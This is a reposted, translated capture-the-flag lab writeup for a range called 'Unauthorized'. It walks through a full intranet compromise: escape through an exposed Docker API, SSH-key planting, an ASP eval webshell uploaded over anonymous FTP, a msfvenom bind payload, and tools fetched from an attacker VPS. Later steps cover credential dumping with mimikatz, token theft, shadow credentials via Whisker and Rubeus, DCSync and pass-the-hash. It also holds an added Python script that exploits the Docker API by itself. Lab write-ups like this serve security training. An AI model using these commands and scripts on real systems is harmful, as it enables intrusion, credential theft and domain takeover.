春秋云镜 (Chunqiu Cloud Mirror) - Unauthorized - Writeup

Target description:

Unauthorized is a medium-difficulty range. Completing it teaches proxy forwarding, internal scanning, information gathering, privilege escalation and lateral movement in an intranet, deepens the understanding of the core authentication mechanisms of an AD domain, and covers a few interesting techniques of domain penetration. The range has 3 flags, spread over different hosts.

At the start we are given a single target IP
4x.xx.xx.xx
We scan it straight away with fscan

fscan -h 4x.xx.xxx.xxx

fscan reports a docker-api unauthorized RCE.

Confirm it by requesting the version endpoint in a browser:

http://4x.xx.xxx.xxx:2375/version

It returns the daemon's version JSON to an anonymous client, which means the Docker Engine API is listening on tcp/2375 without TLS or authentication, so the unauthorized RCE is really exploitable.
Next we need any machine with the docker CLI installed and point it at the remote daemon:

sudo docker  -H tcp://4x.xx.xxx.xxx:2375 ps

Then we start a container in privileged mode. Privileged gives the container the host's block devices, which is what lets us mount the target's disk from inside it.

sudo docker -H tcp://4x.xx.xxx.xxx:2375 run -it --privileged alpine /bin/sh

Inside the container, list the host's disks:

 fdisk -l

Create a directory and mount the host's root partition (/dev/vda1 here) on it:

 mkdir test
 mount /dev/vda1 test
 cd test

Now we can read and write the host's filesystem.
fscan showed SSH open on the target, so instead of a reverse shell I just write an SSH public key into root's authorized_keys and log in.
Generate a key pair with ssh-keygen -t rsa and copy the public key (the single line in id_rsa.pub):

echo ssh-rsa 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 kali@DESK >>/test/root/.ssh/authorized_keys

That is all it takes. The unquoted echo works only because an OpenSSH public-key line contains no shell metacharacters; if /root/.ssh does not exist on the mounted filesystem, create it first with mode 700, and keep authorized_keys at mode 600, since sshd with StrictModes ignores a key file that is writable by others.
Now ssh in as root and we are on the machine.
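The same thing can be done without a docker CLI at all, because the daemon is just an HTTP API. The following is an added example and not code from the original writeup: it checks that /version answers anonymously, creates a container that bind-mounts the host's / (no --privileged needed for that route; privileged is only required for the fdisk/mount approach above), and appends a public key to the host's /root/.ssh/authorized_keys. The target URL, image name and key are placeholders.

```python
"""Added example (not from the original writeup): reach the exposed Docker
Engine API with plain HTTP instead of the docker CLI, and plant an SSH key on
the host through a bind mount of /.  Assumptions: the daemon listens on
tcp/2375 without TLS (what poc-yaml-docker-api-unauthorized-rce means), and
the image is present or pullable.  Host, port and key below are placeholders."""
import json
import shlex
import urllib.error
import urllib.request

ALLOWED_KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256")


def is_unauthenticated_docker(version_body):
    """True when GET /version came back with the daemon's JSON.  A daemon
    behind TLS client-certificate auth never answers an anonymous client with
    this body, so ApiVersion/Version in the reply is the tell."""
    try:
        info = json.loads(version_body)
    except ValueError:
        return False
    return isinstance(info, dict) and "ApiVersion" in info and "Version" in info


def authorized_keys_cmd(pubkey, host_root="/host"):
    """Shell command run inside the container: append PUBKEY to the host's
    /root/.ssh/authorized_keys via the bind mount, with the permissions sshd's
    StrictModes expects.  The key is validated and shell-quoted so a bad value
    cannot alter the command."""
    parts = pubkey.strip().split()
    if len(parts) < 2 or parts[0] not in ALLOWED_KEY_TYPES:
        raise ValueError("not an OpenSSH public key line")
    ssh_dir = f"{host_root}/root/.ssh"
    return (f"mkdir -p {ssh_dir} && chmod 700 {ssh_dir} && "
            f"echo {shlex.quote(' '.join(parts))} >> {ssh_dir}/authorized_keys && "
            f"chmod 600 {ssh_dir}/authorized_keys && echo planted")


def build_escape_spec(pubkey, image="alpine"):
    """Body for POST /containers/create.  Bind-mounting the host's / is enough
    to write host files; --privileged is only needed for the fdisk/mount
    route the writeup takes."""
    return {"Image": image, "Tty": True,
            "Cmd": ["sh", "-c", authorized_keys_cmd(pubkey)],
            "HostConfig": {"Binds": ["/:/host"]}}


def _api(base, method, path, body=None):
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(base + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read()


def plant_ssh_key(base, pubkey, image="alpine"):
    """Full exchange: check exposure, create/start/wait the container, return
    its log output (ends with 'planted' on success)."""
    if not is_unauthenticated_docker(_api(base, "GET", "/version").decode()):
        raise RuntimeError("daemon did not answer /version without auth")
    spec = build_escape_spec(pubkey, image)
    try:
        cid = json.loads(_api(base, "POST", "/containers/create", spec))["Id"]
    except urllib.error.HTTPError as err:
        if err.code != 404:          # 404 here means "No such image"
            raise
        _api(base, "POST", f"/images/create?fromImage={image}&tag=latest")
        cid = json.loads(_api(base, "POST", "/containers/create", spec))["Id"]
    _api(base, "POST", f"/containers/{cid}/start")
    _api(base, "POST", f"/containers/{cid}/wait")
    return _api(base, "GET", f"/containers/{cid}/logs?stdout=1&stderr=1").decode(errors="replace")


if __name__ == "__main__":
    # Placeholder target and key; the real ones are the writeup's.
    print(json.dumps(build_escape_spec("ssh-ed25519 AAAAC3Nz... kali@DESK"), indent=2))
    # plant_ssh_key("http://4x.xx.xxx.xxx:2375", open("/home/kali/.ssh/id_rsa.pub").read())
```

The container is left behind in `docker ps -a` on the target; remove it with DELETE /containers/{id} once the key is in place. The fix on the defending side is the mirror image: never bind the daemon to a TCP port without `tlsverify`, or keep it on the unix socket only.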
Then look for the flag.

The flag is not in a file but in the database, and it is clearly the second entry.
From here on it is lateral movement inside the intranet.
Upload fscan: start a temporary web server on a public VPS and wget the file from the target.

python3 -m http.server 8080
wget 1xx.xx.xx.xx:8080/fscan

Then download frpc to build a tunnel out to the VPS.

wget 1xx.xx.xx.xx:8080/frpc
wget 1xx.xx.xx.xx:8080/frpc.ini
frpc.ini:
[common]
server_addr = 1xx.xx.xx.xx
server_port = 7001


[socks_proxy]
type = tcp
remote_port =8886
plugin = socks5
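As written, the frpc.ini above publishes an unauthenticated SOCKS5 proxy into the target's intranet on the VPS's public port 8886, and an frps without a token accepts any frpc that finds it. The pair below is an added example, not from the original writeup: the same tunnel in frp's old ini format, with a shared token between frps and frpc and a username/password on the socks5 plugin. Token, credentials and the server address are placeholders.

```ini
# frps.ini on the VPS (placeholder values)
[common]
bind_port = 7001
token = REPLACE_WITH_LONG_RANDOM_TOKEN

# frpc.ini on the compromised host (placeholder values)
[common]
server_addr = 1xx.xx.xx.xx
server_port = 7001
token = REPLACE_WITH_LONG_RANDOM_TOKEN

[socks_proxy]
type = tcp
remote_port = 8886
plugin = socks5
plugin_user = pivot
plugin_passwd = REPLACE_WITH_STRONG_PASSWORD
use_encryption = true
```

Proxifier takes the username and password in the proxy server dialog; proxychains takes them as `socks5 1xx.xx.xx.xx 8886 pivot PASSWORD` in proxychains.conf. Restricting port 8886 on the VPS firewall to your own source address is still worth doing on top of this.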

Then make both binaries executable and run them.

root@localhost:/tmp# chmod +x *
root@localhost:/tmp# ./fscan -h 172.22.7.13/24
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.1
start infoscan
(icmp) Target 172.22.7.13     is alive
(icmp) Target 172.22.7.6      is alive
(icmp) Target 172.22.7.31     is alive
(icmp) Target 172.22.7.67     is alive
[*] Icmp alive hosts len is: 4
172.22.7.67:445 open
172.22.7.13:2375 open
172.22.7.6:88 open
172.22.7.31:445 open
172.22.7.6:445 open
172.22.7.67:8081 open
172.22.7.67:139 open
172.22.7.31:139 open
172.22.7.6:139 open
172.22.7.67:135 open
172.22.7.31:135 open
172.22.7.6:135 open
172.22.7.13:80 open
172.22.7.67:80 open
172.22.7.67:21 open
172.22.7.13:22 open
[*] alive ports len is: 16
start vulscan
[*] 172.22.7.67          XIAORANG\WIN-9BMCSG0S
[*] 172.22.7.31          XIAORANG\ADCS
[*] 172.22.7.6     [+]DC XIAORANG\DC02
[+] NetInfo:
[*]172.22.7.67
   [->]WIN-9BMCSG0S
   [->]172.22.7.67
[+] NetInfo:
[*]172.22.7.31
   [->]ADCS
   [->]172.22.7.31
[+] NetInfo:
[*]172.22.7.6
   [->]DC02
   [->]172.22.7.6
[*] WebTitle:http://172.22.7.13        code:200 len:27170  title:某某装饰
[*] WebTitle:http://172.22.7.13:2375   code:404 len:29     title:None
[+] ftp://172.22.7.67:21:anonymous
   [->]1-1P3201024310-L.zip
   [->]1-1P320102603C1.zip
   [->]1-1P320102609447.zip
   [->]1-1P320102615Q3.zip
   [->]1-1P320102621J7.zip
   [->]1-1P320102J30-L.zip
[*] WebTitle:http://172.22.7.67        code:200 len:703    title:IIS Windows Server
[*] WebTitle:http://172.22.7.67:8081   code:200 len:4621   title:公司管理后台
[+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file
[+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak
done 16/16
[*] scan finished, elapsed: 21.061062708s
root@localhost:/tmp#
root@localhost:/tmp# ./frpc -c ./frpc.ini  &
[1] 3616
root@localhost:/tmp# 2022/10/17 17:48:09 [I] [service.go:301] [f866e9720aae6cbe] login to server success, get run id [f866e9720aae6cbe], server udp port [0]
2022/10/17 17:48:09 [I] [proxy_manager.go:144] [f866e9720aae6cbe] proxy added: [socks_proxy]
2022/10/17 17:48:09 [I] [control.go:180] [f866e9720aae6cbe] [socks_proxy] start proxy success
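fscan's flat output hides the interesting parts between the port lines. The script below is an added example, not part of the original writeup: it parses that output into a per-host record (NetBIOS name, DC marker, open ports, web titles, vulnerability hits) and ranks the hosts. The SAMPLE text is copied from the scan above; nothing here touches the network.

```python
"""Added example, not part of the original writeup: parse the raw fscan
output above into a per-host summary and rank the hosts, so that the DC,
the anonymous FTP share, the backup file and the exposed docker API are not
buried in the scroll.  SAMPLE is copied from the scan output above."""
import re
from collections import defaultdict

SAMPLE = r"""
172.22.7.67:445 open
172.22.7.13:2375 open
172.22.7.6:88 open
172.22.7.31:445 open
172.22.7.6:445 open
172.22.7.67:8081 open
172.22.7.67:139 open
172.22.7.31:139 open
172.22.7.6:139 open
172.22.7.67:135 open
172.22.7.31:135 open
172.22.7.6:135 open
172.22.7.13:80 open
172.22.7.67:80 open
172.22.7.67:21 open
172.22.7.13:22 open
[*] 172.22.7.67          XIAORANG\WIN-9BMCSG0S
[*] 172.22.7.31          XIAORANG\ADCS
[*] 172.22.7.6     [+]DC XIAORANG\DC02
[*] WebTitle:http://172.22.7.13        code:200 len:27170  title:某某装饰
[*] WebTitle:http://172.22.7.13:2375   code:404 len:29     title:None
[+] ftp://172.22.7.67:21:anonymous
[*] WebTitle:http://172.22.7.67        code:200 len:703    title:IIS Windows Server
[*] WebTitle:http://172.22.7.67:8081   code:200 len:4621   title:公司管理后台
[+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file
[+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak
"""

PORT_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+):(\d+) open$")
NAME_RE = re.compile(r"^\[\*\] (\d+\.\d+\.\d+\.\d+)\s+(\[\+\]DC )?(\S+)$")
TITLE_RE = re.compile(r"^\[\*\] WebTitle:(\S+)\s+code:(\d+)\s+len:\d+\s+title:(.*)$")
HIT_RE = re.compile(r"^\[\+\] (\w+)://([\d.]+)(?::(\d+))?(\S*)\s*(\S+)?$")


def _new_host():
    return {"name": None, "dc": False, "ports": set(), "web": [], "vulns": []}


def parse_fscan(text):
    """Return {ip: {name, dc, ports, web, vulns}} built from fscan's stdout."""
    hosts = defaultdict(_new_host)
    for line in text.splitlines():
        line = line.strip()
        if m := PORT_RE.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := NAME_RE.match(line):            # NetBIOS line, "[+]DC " marks a DC
            hosts[m[1]]["name"] = m[3]
            hosts[m[1]]["dc"] = m[2] is not None
        elif m := TITLE_RE.match(line):
            ip = re.search(r"//([\d.]+)", m[1])[1]
            hosts[ip]["web"].append(f"{m[1]} [{m[2]}] {m[3].strip()}")
        elif m := HIT_RE.match(line):             # "[+] scheme://ip:port... poc-name"
            scheme, ip, port, rest, poc = m.groups()
            url = f"{scheme}://{ip}" + (f":{port}" if port else "") + rest
            if scheme == "ftp" and rest == ":anonymous":
                hosts[ip]["vulns"].append(f"anonymous FTP login on {ip}:{port}")
            elif poc:
                hosts[ip]["vulns"].append(f"{poc} at {url}")
    return dict(hosts)


def triage(hosts):
    """IPs ordered by attack value: domain controllers first, then the most
    vulnerability hits, then the widest port exposure."""
    return sorted(hosts, key=lambda ip: (hosts[ip]["dc"], len(hosts[ip]["vulns"]),
                                         len(hosts[ip]["ports"])), reverse=True)


if __name__ == "__main__":
    found = parse_fscan(SAMPLE)
    for ip in triage(found):
        h = found[ip]
        tag = " (DC)" if h["dc"] else ""
        print(f"{ip} {h['name'] or '?'}{tag} ports={sorted(h['ports'])}")
        for v in h["vulns"]:
            print("   !", v)
        for w in h["web"]:
            print("   -", w)
```

Run over the scan above it puts DC02 first, then WIN-9BMCSG0S (anonymous FTP plus the www.zip backup), then the docker host, and ADCS last, which is the order the rest of this writeup follows.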

Next, enumerate the intranet assets.
Locally, point Proxifier at the SOCKS proxy and set up its rules, then browse the internal web pages.
Besides the management backend on 8081 there is a www.zip source leak.
Download it and analyse it.
The archive contains the same files that the anonymous FTP share lists, which tells us the FTP root is mapped onto the site's download directory.
So we upload a webshell straight into the FTP root.
An ASP one-liner:

<%eval request("pass")%>
root@localhost:/tmp# ftp 172.22.7.67
Connected to 172.22.7.67.
220 Microsoft FTP Service
Name (172.22.7.67:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-09-22  09:29PM                25356 1-1P3201024310-L.zip
07-09-22  09:29PM                42984 1-1P320102603C1.zip
07-09-22  09:29PM                39333 1-1P320102609447.zip
07-09-22  09:29PM                38231 1-1P320102615Q3.zip
07-09-22  09:29PM                43240 1-1P320102621J7.zip
07-09-22  09:28PM                25105 1-1P320102J30-L.zip
07-09-22  09:29PM                29023 1-1P3201210390-L.zip
07-09-22  09:29PM                41885 1-1P3201211110-L.zip
07-09-22  09:29PM                36787 1-1P3201211380-L.zip
07-09-22  09:29PM                31986 1-1P3201211570-L.zip
07-09-22  09:30PM                 9733 1-1P320163434135.zip
07-09-22  09:29PM                12172 1-1P320163J2J2.zip
07-09-22  09:29PM                 8705 1-1P320163P3963.zip
226 Transfer complete.
ftp> exit
221 Goodbye.
root@localhost:/tmp# echo '<%eval request("pass")%>' > a.asp
root@localhost:/tmp# ftp 172.22.7.67
Connected to 172.22.7.67.
220 Microsoft FTP Service
Name (172.22.7.67:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put a.asp
local: a.asp remote: a.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
26 bytes sent in 0.00 secs (1.3050 MB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-09-22  09:29PM                25356 1-1P3201024310-L.zip
07-09-22  09:29PM                42984 1-1P320102603C1.zip
07-09-22  09:29PM                39333 1-1P320102609447.zip
07-09-22  09:29PM                38231 1-1P320102615Q3.zip
07-09-22  09:29PM                43240 1-1P320102621J7.zip
07-09-22  09:28PM                25105 1-1P320102J30-L.zip
07-09-22  09:29PM                29023 1-1P3201210390-L.zip
07-09-22  09:29PM                41885 1-1P3201211110-L.zip
07-09-22  09:29PM                36787 1-1P3201211380-L.zip
07-09-22  09:29PM                31986 1-1P3201211570-L.zip
07-09-22  09:30PM                 9733 1-1P320163434135.zip
07-09-22  09:29PM                12172 1-1P320163J2J2.zip
07-09-22  09:29PM                 8705 1-1P320163P3963.zip
10-17-22  05:55PM                   26 a.asp
226 Transfer complete.
ftp>

Upload done.
Connect to it with Godzilla or any other webshell client.

Next, generate a payload that listens for a forward (bind) connection.
The target has no outbound internet access, so a reverse payload would never call back.

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4445 -f exe -o 1.exe


Run it through the webshell, then connect to the listening port 4445 with msf, routed through the SOCKS proxy.

msf6> use exploit/multi/handler
msf6> set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set proxies socks5:1xx.xx.xx.xx:8886
msf6 exploit(multi/handler) > set RHoST 172.22.7.67
RHoST => 172.22.7.67
msf6 exploit(multi/handler) > set  LPORT  4445
LPORT => 4445
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 172.22.7.67:4445
NOTE: Rex::Socket.gethostbyname is deprecated, use getaddress, resolve_nbo, or similar instead. It will be removed in the next Major version
[*] Sending stage (200774 bytes) to 172.22.7.67
[*] Meterpreter session 3 opened (192.168.1.104:58373 -> 1xx.xx.xx.xx:8886) at 2022-10-17 18:01:44 +0800

meterpreter >

getsystem escalates to SYSTEM straight away.

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Then load kiwi and dump the credentials.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain    NTLM                              SHA1                                      DPAPI
--------       ------    ----                              ----                                      -----
WIN-9BMCSG0S$  XIAORANG  a85436900fad5521ab67cf6bc5ecf13a  7798c121e94987889f967251afdeb029562ca579
zhangfeng      XIAORANG  97db334121c5d97762be2bf549a5eb34  e197e0a2d4cd8de4196e8758a70814ba11689767  46b7d9fb7ad9ff9b6ef089249690dd56

wdigest credentials
===================

Username       Domain    Password
--------       ------    --------
(null)         (null)    (null)
WIN-9BMCSG0S$  XIAORANG  (null)
zhangfeng      XIAORANG  (null)

kerberos credentials
====================

Username       Domain        Password
--------       ------        --------
(null)         (null)        (null)
WIN-9BMCSG0S$  xiaorang.lab  2e 71 03 fd 8f d8 12 79 30 be 2f 69 71 bd 21 a9 a9 28 21 0b 38 94 f9 cb a5 0e a0 63 f3 b6 f3 0c ad a9 a6 5d c3 c1 98 f9 d4 df
                              0a af 1b ec c6 e0 98 59 5d f8 5d ad 34 7d dc a3 f6 b3 e1 34 7c 94 e7 54 a7 0c 94 fa ba 37 c5 6c 9c 84 d3 53 89 a3 29 31 34 7
                             6 6d 4f e8 a4 05 a2 f1 6c bf 6c 26 dc ba ac a7 56 2c e1 c7 47 98 c5 2a 5c 77 10 98 1c f8 2d b7 35 8e b2 0f 3a 82 22 13 22 fa
                             c7 b9 e9 b4 0d fb 5d e1 c9 bd d5 37 e0 bb 85 5f 21 53 90 c1 58 cd 4e c2 13 c2 60 be 4c 59 1a 87 dc ea 0e 9a fb d8 8a 9f cd 50
                              7e a7 b7 01 cf e4 d8 86 0d 5a a9 7b 03 09 f0 f1 19 fa 87 2b c2 63 9b d2 58 64 b5 b0 96 54 d6 3d 57 a7 91 48 88 e5 51 2d c5 4
                             2 5f b7 db a0 3a 9f b7 99 10 59 e3 d6 91 fc 98 cf c4 d2 8b a0 c0 48 51 19 91 cb ec 33 76 3a d5
win-9bmcsg0s$  XIAORANG.LAB  (null)
zhangfeng      XIAORANG.LAB  FenzGTaVF6En

Drop into a shell to gather more information.

meterpreter > shell
Process 4256 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\background\download>net user /domain
net user /domain
The request will be processed at a domain controller for domain xiaorang.lab.


User accounts for \\DC02.xiaorang.lab

-------------------------------------------------------------------------------
Administrator            chenjian                 chenjun
chentao                  chenwei                  chenyong
Guest                    krbtgt                   lijun
liliang                  liting                   liuping
zhangfeng                zhangjian                zhangjie
zhangkai                 zhangli                  zhangpeng
zhangyong
The command completed with one or more errors.


C:\inetpub\wwwroot\background\download>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
WDAGUtilityAccount
The command completed with one or more errors.


C:\inetpub\wwwroot\background\download>net time /domain
net time /domain
Current time at \\DC02.xiaorang.lab is 2022/10/17 18:08:49

The command completed successfully.


C:\inetpub\wwwroot\background\download>net user zhangfeng /domain
net user zhangfeng /domain
The request will be processed at a domain controller for domain xiaorang.lab.

User name                    zhangfeng
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2022/7/9 16:31:53
Password expires             Never
Password changeable          2022/7/10 16:31:53
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2022/10/10 4:05:24

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Key Admins           *Domain Users
The command completed successfully.


C:\inetpub\wwwroot\background\download>

This shows that zhangfeng is a member of the Key Admins group, and that is what we will abuse: Key Admins is granted write access to the msDS-KeyCredentialLink attribute of objects in the domain, so a member can add a Key Trust (shadow) credential to any account, the DC's machine account included.
Before that we need to move our context onto the domain account XIAORANG\zhangfeng.
I use the incognito module to steal its token.

meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
IIS APPPOOL\background
NT AUTHORITY\SYSTEM
XIAORANG\zhangfeng

Impersonation Tokens Available
========================================
NT AUTHORITY\IUSR

meterpreter > impersonate_token "XIAORANG\zhangfeng"
[+] Delegation token available
[+] Successfully impersonated user XIAORANG\zhangfeng
meterpreter > shell
Process 2848 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\background\download>whoami
whoami
xiaorang\zhangfeng

Once the token switch is done we can abuse the Key Admins membership (more details follow).
First get the source of https://github.com/eladshamir/Whisker, compile it, upload it to the target and run it from that shell:

Whisker.exe add /target:DC02$ /domain:xiaorang.lab /dc:DC02.xiaorang.lab

Whisker writes a new key credential to DC02$ and prints the Rubeus command to use it, including the generated certificate and its password.
Then upload Rubeus.exe, built from https://github.com/GhostPack/Rubeus.
Add /ptt to the command so the ticket is imported into the current logon session; the command Whisker printed above does not include it.

Rubeus.exe asktgt /user:DC02$ /certificate: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 /password:"v1FkG1vTFGEO0abD" /domain:xiaorang.lab /dc:DC02.xiaorang.lab /getcredentials /show /ptt

With a TGT for DC02$ in memory we can DCSync the domain administrator's hash directly with mimikatz: a domain controller's machine account holds the replication rights DCSync needs. (/getcredentials also prints DC02$'s NTLM hash, so the same DCSync can be done from Linux with impacket-secretsdump instead.)

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:xiaorang\Administrator" exit

We now have the domain administrator's hash.
Use wmiexec from the impacket toolkit to move onto the DC with it.

$ impacket-wmiexec   xiaorang.lab/administrator:@172.22.7.6  -hashes :bf967c5a0f7256e2eaba589fbd29a382
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
DC02
C:\>type C:\users\administrator\flag\*

C:\users\administrator\flag\flag03.txt

 __    __                                  __      __                            __                            __
/  |  /  |                                /  |    /  |                          /  |                          /  |
$$ |  $$ | _______    ______   __    __  _$$ |_   $$ |____    ______    ______  $$/  ________   ______    ____$$ |
$$ |  $$ |/       \  /      \ /  |  /  |/ $$   |  $$      \  /      \  /      \ /  |/        | /      \  /    $$ |
$$ |  $$ |$$$$$$$  | $$$$$$  |$$ |  $$ |$$$$$$/   $$$$$$$  |/$$$$$$  |/$$$$$$  |$$ |$$$$$$$$/ /$$$$$$  |/$$$$$$$ |
$$ |  $$ |$$ |  $$ | /    $$ |$$ |  $$ |  $$ | __ $$ |  $$ |$$ |  $$ |$$ |  $$/ $$ |  /  $$/  $$    $$ |$$ |  $$ |
$$ \__$$ |$$ |  $$ |/$$$$$$$ |$$ \__$$ |  $$ |/  |$$ |  $$ |$$ \__$$ |$$ |      $$ | /$$$$/__ $$$$$$$$/ $$ \__$$ |
$$    $$/ $$ |  $$ |$$    $$ |$$    $$/   $$  $$/ $$ |  $$ |$$    $$/ $$ |      $$ |/$$      |$$       |$$    $$ |
 $$$$$$/  $$/   $$/  $$$$$$$/  $$$$$$/     $$$$/  $$/   $$/  $$$$$$/  $$/       $$/ $$$$$$$$/  $$$$$$$/  $$$$$$$/

flag04:flag{8xxxxe-4f3xxxx2-8xxxxx-8xxxxx5}

The other domain host, ADCS, can be reached the same way.

$ impacket-wmiexec   xiaorang.lab/administrator:@172.22.7.31  -hashes :bf967c5a0f7256e2eaba589fbd29a382
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
ADCS

And that is the end of the range.


Reposted from blog.csdn.net/qq_35607078/article/details/131679406